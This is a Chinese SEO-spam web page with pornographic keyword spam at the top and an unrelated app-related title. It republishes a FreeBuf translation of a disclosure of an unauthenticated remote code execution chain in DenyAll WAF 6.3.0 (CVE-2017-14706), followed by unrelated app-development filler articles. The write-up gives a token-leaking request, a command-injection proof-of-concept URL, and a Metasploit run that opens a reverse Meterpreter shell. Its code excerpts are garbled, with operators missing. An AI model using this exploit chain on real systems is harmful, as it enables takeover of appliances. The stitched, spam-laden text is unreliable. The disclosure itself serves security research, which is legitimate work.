cao死我好湿好紧好爽动态视屏|精选久久久久久久久久|中文无码精品一区二区三区四季|AAA国语精品刺激对白视频|

當(dāng)前位置:首頁(yè) > APP資源 > 正文內(nèi)容

蜜源app里怎么找漏洞產(chǎn)品(蜜源app里怎么找漏洞產(chǎn)品呢)

APP資源8個(gè)月前 (05-25)408

DenyAll WAF算是下一代應(yīng)用安全的基礎(chǔ)產(chǎn)品,它結(jié)合了易于配置的工作流程引擎和管理界面API,具有確保Web應(yīng)用安全的成熟功能,而且包含了主動(dòng)和被動(dòng)安全性技術(shù)、關(guān)聯(lián)特征、用戶(hù)行為分析和即將升級(jí)的rWeb高級(jí)安全引擎,能有效保護(hù)Web應(yīng)用程序并最大程度減少誤報(bào)。而在本文中,我要展示的是我們團(tuán)隊(duì)發(fā)現(xiàn)的DenyAll WAF未授權(quán)RCE遠(yuǎn)程漏洞一枚(CVE-2017-14706)。

漏洞主要信息

遠(yuǎn)程利用: 是

授權(quán)需要: 否

漏洞涉及版本: 6.3.0

漏洞涉及架構(gòu): NodeJS、Kibana、PHP

漏洞涉及產(chǎn)品: DenyAll WAF

CVSSv3 評(píng)分: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

發(fā)現(xiàn)日期: 2017.6.30

遠(yuǎn)程利用: 是

授權(quán)需要: 否

漏洞涉及版本: 6.3.0

漏洞涉及架構(gòu): NodeJS、Kibana、PHP

漏洞涉及產(chǎn)品: DenyAll WAF

CVSSv3 評(píng)分: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

展開(kāi)全文

發(fā)現(xiàn)日期: 2017.6.30

一開(kāi)始,我通過(guò)了亞馬遜的在線(xiàn)商城看到了關(guān)于DenyAll WAF的15天免費(fèi)試用,所以我一步步注冊(cè)之后就部署了這個(gè)產(chǎn)品。通過(guò)SSH key登錄進(jìn)入之后我發(fā)現(xiàn)其管理員接口是NodeJS的架構(gòu),所以首先我在其中查找登錄過(guò)程代碼:

var login = function login(req,res,next) { log.debug(); if (!req.body) req.body = {}; var data = { login:req.body.username || req.query.username, pass:req.body.password || req.query.password, readOnly:req.body.readOnly || req.query.readOnly || false, forceConnexion:req.body.forceConnexion || req.query.forceConnexion || true, clientIp: req.ip }; // I OMITTED tHE CODE _xmlApiClient.request(opts, function(err, response) { // I OMITTED tHE CODE },res); };

從以上代碼可知,貌似存在一個(gè)內(nèi)部API用于NodeJS進(jìn)行認(rèn)證等操作,為了找到這個(gè)API,我繼續(xù)來(lái)看_xmlApiClient相關(guān)代碼,而在xmlApiClient.js文件中存在一個(gè)有意思的函數(shù):

var xmlApiRequest = function xmlApirequest(opts, callback, res) { // ... CODE OMITTED ... var target = 'https://' + _config.xmlApi.host + ':' + _config.xmlApi.port + '/webservices/index.php?api=' + opts.api + 'function=' + opts.func; // ... CODE OMITTED ... };

然后,我們開(kāi)始收集更多關(guān)于該產(chǎn)品的有用信息,找到了其中的PHP API,其中還包括了來(lái)自配置文件的端口(3001)和主機(jī)(127.0.0.1)的變量:

"xmlApi": { "host": "127.0.0.1", "port": "3001", "guiVersionFile":"/etc/version.txt", "nodeId": null, "tcpTimeout":1000, "httpTimeout":300000 },

再對(duì)部署了DenyAll WAF的主機(jī)進(jìn)行netstat監(jiān)聽(tīng)后發(fā)現(xiàn),其中的本機(jī)綁定端口監(jiān)聽(tīng)列表中,竟然沒(méi)有端口3001!

~ netstat -tnlp |grep -v '127\|::' Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 172.31.11.218:2222 0.0.0.0:* LISTEN - tcp 0 0 172.31.11.218:22 0.0.0.0:* LISTEN - tcp 0 0 172.31.11.218:3001 0.0.0.0:* LISTEN 3866/actrld tcp 0 0 172.31.11.218:3002 0.0.0.0:* LISTEN - 對(duì)PHP后端的濫用

在PHP服務(wù)端/webservices/download/index.php中也存在一段有意思的代碼:

if($_REQUEST['typeOf']!='kdbImages' $_REQUEST['typeOf']!='debug'){ //validation jeton if(isset($_REQUEST['iToken'])){ if($local-getIToken()!=$_REQUEST['iToken']){ header('HTTP/1.1 403 Forbidden'); exit(-1); } }else{ if(isset($_REQUEST['tokenId'])){ if(!API_validUid($_REQUEST['tokenId'])){ header('HTTP/1.1 403 Forbidden'); exit(-2); } $session = loadClass('sessions'); if($session-searchUid($_REQUEST['tokenId'])===false){ header('HTTP/1.1 403 Forbidden'); exit(-3); }else{ if(!isset($_REQUEST['forceNoRefresh'])){ $session-refreshTimeSession($_REQUEST['tokenId']); $session-save(); } unset($session); } }else{ header('HTTP/1.1 403 Forbidden'); exit(-2); } } }

從以上這段代碼可以看出,如果typeOf參數(shù)不是kdbImages或debug時(shí),整個(gè)認(rèn)證機(jī)制都將被繞過(guò)!

另外,從另外一段中還可發(fā)現(xiàn),其中存在一個(gè)可被下載的debug.dat,而debug.dat中可能包含一些重要信息:

case 'debug' : $norealpath=false; $removeSrc=true; $compress=false; $removeDst=false; $autoDownload=true; if(!isset($_REQUEST['applianceUid'])){ debug("download debug sans applianceUid"); exit; } $applianceUid=$_REQUEST['applianceUid']; $src=downloadFile('debugInternal',$applianceUid,'debug.dat'); $dst=$src=realpath($src); $fileNameDownload=basename($src); if(!is_readable($src)) exit; break;

而經(jīng)過(guò)抓包測(cè)試,以下過(guò)程為debug.dat的下載請(qǐng)求連接流:

蜜源app里怎么找漏洞產(chǎn)品(蜜源app里怎么找漏洞產(chǎn)品呢)

GET /webservices/download/index.php?applianceUid=LOCALUIDtypeOf=debug HTTP/1.1 Host: 52.28.216.170:3001 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 4 RESPONSE HTTP/1.1 200 OK Date: Fri, 30 Jun 2017 17:30:12 GMT Server: Apache Content-disposition: attachment; filename="debug.dat" Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Length: 697 Pragma: public Content-Type: application/vnd.nokia.n-gage.data Internal error 2017-06-30 17:30:12 (UTC) a:3:{s:6:"typeOf";s:13:"debugInternal";s:4:"file";s:9:"debug.dat";s:6:"iToken";s:32:"y760e0299ba6fc1a2739df5a8f64fc5a";} 2 Alerte touch(): Unable to create file /var/tmp/debug/ because Is a directory /var/denyall/www-root/wsSource/class/filesClass.php 18 1280

其中的關(guān)鍵信息就是iToken,它用于DenyAll WAF應(yīng)用的認(rèn)證,所以這個(gè)關(guān)鍵的泄露給了我們進(jìn)一步挖掘的欲望。

命令注入

其實(shí),DenyAll WAF中存在多處命令注入,其中一處為/webservices/stream/tail.php,以下是其中的一段代碼:

if(isset($_REQUEST['iToken'])){ if($local-getIToken()!=$_REQUEST['iToken']){ exitPrint(t_("Bad key, authentication on slave streaming server failed")); } }else{ exitPrint(t_("Authentication on slave streaming server failed")); } if(isset($_REQUEST['tag']) $_REQUEST['tag']!=''){ // on doit chercher le bon fichier if(isset($_REQUEST['stime'])$_REQUEST['stime']!=''){ // Start time version tailDateFile(); }else{ // dernier fichier ouvert if($_REQUEST['tag']=='tunnel') $_REQUEST['file']=basename(shell_run("ls -1t ".__RP_LOG__."*/".$_REQUEST['uid']."/*-".$_REQUEST['type'].".log| head -n1 2/dev/null")); else $_REQUEST['file']=$_REQUEST['uid'].'-'.$_REQUEST['type'].'.log'; } }

在iToken可被泄露的情況下,這里又出現(xiàn)了另一個(gè)函數(shù)tailDateFile(),以下是其具體代碼:

function tailDateFile(){ global $_REQUEST; $stime=(int)($_REQUEST['stime']/1000); $tag=$_REQUEST['tag']; $uid=$_REQUEST['uid']; $type=$_REQUEST['type']; // access or error chdir(__RP_LOG__); if($tag=='tunnel'){ // reverse proxy $files=shell_run("ls -1 */$uid/*-$type-*.log 2/dev/null|sort")."\n"; // avec date trié au début $files.=shell_run("ls -1t */$uid/*-$type.log 2/dev/null"); // courant trié par utilisation }else{ $files=shell_run("ls -1 $uid-$type*-log 2/dev/null|sort")."\n"; $files.=shell_run("ls -1t $uid-$type.log 2/dev/null"); } // .. CODE OMITTED .. }

從以上代碼可以看到,$uid參數(shù)可被控制,而且它還是shell_run()函數(shù)變量的一部分。結(jié)合上述提及的這兩方面問(wèn)題,我們就能實(shí)現(xiàn)未授權(quán)命令注入漏洞。

PoC

通過(guò)HTTP請(qǐng)求觸發(fā)遠(yuǎn)程RCE實(shí)現(xiàn):

GET /webservices/stream/tail.php?iToken=y760e0299ba6fc1a2739df5a8f64fc5atag=tunnelstime=aaatype=aaa$(sleep%2030") HTTP/1.1 Host: 52.28.216.170:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: connect.sid=s%3AWGBO5SaeECriIG8z4SMjwilZgl7SM0ej.0hGC0CcXrwnoJLb4YucLi8lbr%2FC8f2TNIicG4EmFLFU Connection: close Upgrade-Insecure-Requests: 1 Metasploit反彈控制模塊

https://github.com/rapid7/metasploit-framework/pull/8980

msfexploit(denyall_exec) set RHOST 35.176.123.128 RHOST = 35.176.123.128 msfexploit(denyall_exec) set LHOST 35.12.3.3 LHOST = 35.12.3.3 msfexploit(denyall_exec) check [*]35.176.123.128:3001 The target appears to be vulnerable. msfexploit(denyall_exec) exploit [-]Handler failed to bind to 35.12.3.3:4444:- - [*]Started reverse TCP handler on 0.0.0.0:4444 [*]Extracting iToken value from unauthenticated accessible endpoint. [+]Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a [*]Trigerring command injection vulnerability with iToken value. [*]Sending stage (40411 bytes) to 127.0.0.1 [*]Meterpreter session 1 opened (127.0.0.1:4444 - 127.0.0.1:60556) at 2017-09-19 14:31:52 +0300 meterpreter pwd /var/log/denyall/reverseproxy meterpreter exit [*]Shutting down Meterpreter... [*]172.31.11.218 - Meterpreter session 1 closed. Reason: User exit msfexploit(denyall_exec) exit ? ~exit 漏洞報(bào)送時(shí)間線(xiàn)

2017.6.30 21:33 發(fā)現(xiàn)漏洞

2017.6.30 22:37 DenyAll CTO與我們?nèi)〉寐?lián)系

2017.9.19 DenyAll發(fā)布更新版本

2017.6.30 21:33 發(fā)現(xiàn)漏洞

2017.6.30 22:37 DenyAll CTO與我們?nèi)〉寐?lián)系

2017.9.19 DenyAll發(fā)布更新版本

*參考來(lái)源:pentest,freebuf小編clouds編譯,轉(zhuǎn)載請(qǐng)注明來(lái)自FreeBuf.COM

掃描二維碼推送至手機(jī)訪(fǎng)問(wèn)。

版權(quán)聲明:本文由飛速云SEO網(wǎng)絡(luò)優(yōu)化推廣發(fā)布,如需轉(zhuǎn)載請(qǐng)注明出處。

本文鏈接:http://www.smallwaterjetsystem.com/post/115961.html

“蜜源app里怎么找漏洞產(chǎn)品(蜜源app里怎么找漏洞產(chǎn)品呢)” 的相關(guān)文章

武漢app定制開(kāi)發(fā)公司(武漢app定制開(kāi)發(fā)公司怎么樣)

武漢app定制開(kāi)發(fā)公司(武漢app定制開(kāi)發(fā)公司怎么樣)

1華盛恒輝科技有限公司 上榜理由華盛恒輝是一家專(zhuān)注于高端軟件定制開(kāi)發(fā)服務(wù)和高端建設(shè)的服務(wù)機(jī)構(gòu),致力于為企業(yè)提供全面系統(tǒng)的開(kāi)發(fā)制作方案在開(kāi)發(fā)建設(shè)到運(yùn)營(yíng)推廣領(lǐng)域擁有豐富經(jīng)驗(yàn),在教育,醫(yī)療,APP,管理,商城,人工。 三整體評(píng)估選擇開(kāi)發(fā)公司,一定要進(jìn)行整體評(píng)估,一是評(píng)估自身,二是評(píng)估對(duì)方四跟進(jìn)速度好的AP...

做企業(yè)規(guī)劃的app(做企業(yè)規(guī)劃的步驟有哪些)

做企業(yè)規(guī)劃的app(做企業(yè)規(guī)劃的步驟有哪些)

十大室內(nèi)設(shè)計(jì)培訓(xùn)機(jī)構(gòu)排行榜 現(xiàn)在室內(nèi)設(shè)計(jì)的門(mén)檻越來(lái)越低,越來(lái)越考驗(yàn)設(shè)計(jì)師的能力,想要讓自己的技術(shù)精益求精,想在預(yù)計(jì)的時(shí)間內(nèi)學(xué)到真本領(lǐng),則選擇去正規(guī)學(xué)校進(jìn)行專(zhuān)業(yè)的學(xué)習(xí)。因?yàn)閷?zhuān)業(yè)的室內(nèi)培訓(xùn)學(xué)??梢越o學(xué)員進(jìn)行更加正規(guī)的培訓(xùn),比如杭州清風(fēng)室內(nèi)設(shè)計(jì)培訓(xùn)學(xué)院,專(zhuān)攻室內(nèi)設(shè)計(jì)一門(mén)專(zhuān)業(yè),老師都是股份責(zé)任制,培訓(xùn)班進(jìn)行...

優(yōu)秀的app首頁(yè)設(shè)計(jì)樣式(優(yōu)秀的app首頁(yè)設(shè)計(jì)樣式有哪些)

優(yōu)秀的app首頁(yè)設(shè)計(jì)樣式(優(yōu)秀的app首頁(yè)設(shè)計(jì)樣式有哪些)

UI設(shè)計(jì)必要知道的APP頁(yè)面 一起始頁(yè)launchscreen說(shuō)明程序啟動(dòng)時(shí)需要一定的反應(yīng)時(shí)間,在這段時(shí)間內(nèi)屏幕處于空置狀態(tài),為了讓用戶(hù)知道程序已經(jīng)啟動(dòng),現(xiàn)在只有一個(gè)加載過(guò)程,而且也是為了緩解用戶(hù)的焦慮,所以用圖片視頻代替;回答目前互聯(lián)發(fā)展勢(shì)頭越來(lái)越好,app應(yīng)用也是日益增多,因此app的引導(dǎo)頁(yè)設(shè)計(jì)...

快手app成人短視頻(快手app成人短視頻怎么下載)

快手app成人短視頻(快手app成人短視頻怎么下載)

1、首先,打開(kāi)快手應(yīng)用,然后點(diǎn)擊右下角的“我的”按鈕在個(gè)人主頁(yè)上方會(huì)出現(xiàn)一個(gè)“青少年模式”的選項(xiàng),點(diǎn)擊進(jìn)入在青少年模式頁(yè)面上,你需要進(jìn)行實(shí)名認(rèn)證以證明你已經(jīng)滿(mǎn)足使用成年版的條件完成實(shí)名認(rèn)證后,你可以點(diǎn)擊頁(yè)面上的。 2、快手成年版可以通過(guò)以下步驟打開(kāi)1 打開(kāi)快手App首先,在手機(jī)上找到并打開(kāi)已經(jīng)安裝好...

app應(yīng)用開(kāi)發(fā)哪里做得好(各種app開(kāi)發(fā)的是學(xué)什么專(zhuān)業(yè)的)

app應(yīng)用開(kāi)發(fā)哪里做得好(各種app開(kāi)發(fā)的是學(xué)什么專(zhuān)業(yè)的)

北京華盛恒輝科技有限公司東軟集團(tuán)海輝軟件等都不錯(cuò)北京華盛恒輝科技有限公司hivekion是一家專(zhuān)注IT產(chǎn)品研發(fā)與服務(wù)的企業(yè),是全球領(lǐng)先的IT解決方案提供商?hào)|軟以軟件技術(shù)為核心,通過(guò)軟件與服務(wù)的結(jié)合,軟件與制造的。 其實(shí)市場(chǎng)上做APP的也有好多公司,但是每一個(gè)公司他主營(yíng)都不一樣,因?yàn)槊總€(gè)公司技術(shù)的專(zhuān)業(yè)...

做個(gè)手機(jī)購(gòu)物app的費(fèi)用大概多少(做個(gè)手機(jī)購(gòu)物app的費(fèi)用大概多少呢)

做個(gè)手機(jī)購(gòu)物app的費(fèi)用大概多少(做個(gè)手機(jī)購(gòu)物app的費(fèi)用大概多少呢)

1、根據(jù)2019年12月的最新數(shù)據(jù),開(kāi)發(fā)一個(gè)app大概需要幾萬(wàn)到幾百萬(wàn)不等開(kāi)發(fā)一個(gè)安卓app軟件,需要考慮因素很多如果是一款功能簡(jiǎn)單不是很全面,客戶(hù)幾乎沒(méi)有什么要求的APP,只需要讓美工對(duì)前臺(tái)ui頁(yè)面進(jìn)行一定程度的修改,最短一;做一個(gè)手機(jī)購(gòu)物APP要多少錢(qián) 做一個(gè)購(gòu)物類(lèi)型的APP大概需要多少錢(qián),一年...